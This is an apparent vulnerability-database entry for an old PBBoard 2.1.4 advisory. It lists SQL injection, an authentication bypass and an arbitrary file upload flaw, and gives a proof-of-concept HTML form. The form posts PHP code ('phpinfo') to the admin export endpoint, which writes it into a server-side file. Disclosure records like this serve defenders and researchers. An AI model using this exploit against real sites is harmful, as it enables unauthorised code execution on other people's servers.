Lucene search
High-Tech BridgeEDB-ID:37616HistoryAug 08, 2012 - 12:00 a.m.
PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution
2012-08-0800:00:00
High-Tech Bridge
www.exploit-db.com
34
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/54916/info
PBBoard is prone to multiple security vulnerabilities including:
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
PBBoard 2.1.4 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">
<input type="hidden" name="context" value='<? phpinfo(); ?>'>
<input type="submit" name="Submit" value="Send">
</form>Related
cve
cve
CVE-2012-4036
2012-08-27 23:55:02
nvd
nvd
CVE-2012-4036
2012-08-27 23:55:02
prion
prion
Unrestricted file upload
2012-08-27 23:55:00
cvelist
cvelist
CVE-2012-4036
2012-08-27 23:00:00
htbridge
htbridge
Multiple vulnerabilities in PBBoard
2012-07-18 00:00:00
packetstorm
packetstorm
zdt
zdt
securityvulns
securityvulns
Multiple vulnerabilities in PBBoard
2012-08-13 00:00:00